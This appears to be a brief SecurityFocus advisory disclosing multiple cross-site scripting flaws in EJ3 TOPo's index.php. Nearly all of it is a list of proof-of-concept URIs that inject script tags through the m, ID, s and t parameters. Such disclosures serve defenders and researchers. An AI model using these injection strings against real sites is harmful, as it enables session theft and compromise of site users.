EJ3 TOPo Multiple Index.PHP Cross-Site Scripting Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/topo/index.php?m=top"><SCRIPT>alert()</script>&s=info&ID=1114815037.2498
http://www.example.com/topo/index.php?m=top&s=info&ID=1115946293.3552"><SCRIPT>alert()</SCRIPT>&t=puntuar
http://www.example.com/topo/index.php?m=top&s=info"><script>alert()</script>&ID=1115946293.3552&t=puntuar
http://www.example.com/topo/index.php?m=top"><script>alert()</script>&s=info&ID=1115946293.3552&t=puntuar
http://www.example.com/topo/index.php?m=top&s=info&t=comments&ID=1114815037.2498"><SCRIPT>alert()</script>
http://www.example.com/topo/index.php?m=top&s=info&t=comments&paso=1&ID=1111068112.7598"><SCRIPT>alert()</script>
http://www.example.com/topo/index.php?m=members&s=html&t=edit"><SCRIPT>alert()</script>


 

Privacy Statement
Copyright 2010, SecurityFocus